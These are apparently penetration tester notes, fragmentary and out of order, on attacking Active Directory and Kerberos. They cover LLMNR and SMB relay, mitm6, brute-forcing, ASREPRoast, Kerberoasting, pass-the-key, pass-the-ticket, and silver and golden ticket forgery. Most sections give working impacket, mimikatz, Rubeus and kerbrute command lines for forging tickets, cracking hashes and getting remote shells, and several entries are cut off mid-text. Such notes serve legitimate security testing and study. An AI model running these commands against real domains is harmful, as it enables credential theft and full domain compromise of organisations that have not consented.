LLMNR Poisoning SMB Relay Attacks Responder msfconsole Impacket psexec smbexec wmiexec IPv6 Attacks IPv6 DNS Takeover Mitm6 https://github.com/dirkjanm/mitm6 https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/
Active Directory Pentest Mind Map https://www.xmind.net/m/5dypm8/# https://tajdini.net/blog/penetration/active-directory-penetration-mind-map/ [[Active-Directory-Penetration-Manual_1.png]] [[Active-Directory-Penetration-Manual_1.png]]
2 ASREPRoast user with “Do not require Kerberos pre-authentication” enabled in AD that is disabled by default. allows anyone to send AS_REQ to KDC on the user’s behalf and receive AS_REP message that contains encrypted data with original user key derived from its password. Crack the hash to retrieve password. no domain accounts required; just connectivity to KDC (DC) however, with a domain account, users w/o Kerberos pre-auth in the domain can be retrieved via an LDAP query: (&(samAccountType=805306368)(userAccountControl:1....
7. Golden ticket similar to Silver Ticket craft TGT using NTLM hash of the krbtgt AD account allows access to any machine in the domain hash obtained from the LSASS process or the NTDS.dit file of any DC in the domain Tools: impacket’s ticketer.py & psexec.py (Linux), mimikatz & Rubeus (Windows) Linux ticketer.py -domain-sid SID -domain DOMAIN -nthash HASH USERNAME export KRB5CCNAME=USERNAME.ccache psexec.py DOMAIN\USERNAME@$IP -k -no-pass Windows .\mimikatz.exe kerberos::golden /domain:DOMAIN /sid:SID /rc4:HASH /user:USERNAME kerberos::ptt TICKET....
3. Kerberoasting harvesting TGS for services running on behalf of user accounts TGS tickets to be cracked to retrieve user password requires domain account allowed to request TGS; typically any domain account since no special privileges required LDAP query to retrieve user accounts with associated services: (&(samAccountType=805306368)(servicePrincipalName=*)) first parameter: request user accounts ONLY (no computer accounts) second parameter: filter by accounts with at least 1 service Tools: impacket’s GetUserSPNs.py (Linux), Rubeus (Windows) Linux GetUserSPNs....
Kerberos Attacks Cheatsheet https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a Kerberos cheatsheet Bruteforcing With kerbrute.py: python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file> With Rubeus version with brute module: # with a list of users .\\Rubeus.exe brute /users:<users_file> /passwords:<passwords_file> /domain:<domain_name> /outfile:<output_file> # check passwords for all users in current domain .\\Rubeus.exe brute /passwords:<passwords_file> /outfile:<output_file> ASREPRoast With Impacket example GetNPUsers.py: # check ASREPRoast for all domain users (credentials required) python GetNPUsers.py <domain_name>/<domain_user>:<domain_user_password> -request -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file> # check ASREPRoast for a list of users (no credentials required) python GetNPUsers....
1. Kerberos brute-force no domain accounts required; just connectivity to KDC (DC) Kerberos pre-auth errors not logged in AD as normal logon failure (event 4625) but as specific Kerberos pre-auth failure (event 4771) will increment failed login counts Kerberos indicates whether username is correct regardless of correct/incorrect password good for: brute-forcing user:pass combos or single user against wordlist enumerating usernames password spraying against userlist possible to discover accounts w/o pre-auth requirements which is useful for ASREPRoast attacks NOTE: a brute-force attack is always susceptible to being detected and blocked, hence, should be used with care....
4. Pass the key aka Overpass The Hash use user’s NTLM hash to request Kerberos tickets as alternative to Pass The Hash over NTLM protocol requires: a system where NTLM authentication is disabled and only Kerberos authentication is allowed NTLM hash or password of target user results in access to service/machine which target user has permissions to (get shell) Tools: impacket’s getTGT.py & psexec.py (Linux), Rubeus (Windows) Linux getTGT.py DOMAIN/USERNAME -dc-ip $IP -hashes :NTHASH export KRB5CCNAME=USERNAME....
5. Pass the ticket similar to Pass The Key steals ticket instead of requesting ticket via known hash in Linux, tickets are stored in credential caches (ccache) 3 main locations: files, /tmp/krb5cc_%{uid} (default) Kernel Keyrings - specail space in Linux kernel for storing keys process memory - used when only one process needs to use the ticket in Windows, tickets are handled and stored by the LSASS (Local Security Authority Subsystem Service) process responsible for security....
6. Silver ticket craft valid TGS for a service after owning NTLM hash of an account gain access of that service by forging custom TGS with max privilege Tools: impacket’s ticketer.py & psexec.py (Linux), mimikatz & Rubeus (Windows) Linux ticketer.py -domain-sid SID -domain DOMAIN -spn SPN -nthash HASH USERNAME export KRB5CCNAME=USERNAME.ccache psexec.py DOMAIN\USERNAME@$IP -k -no-pass Windows .\mimikatz.exe kerberos::golden /domain:DOMAIN /sid:SID /rc4:HASH /user:USERNAME /service:SPN /target:DCHOSTNAME kerberos::ptt TICKET.kirbi or use Rubeus to do the same...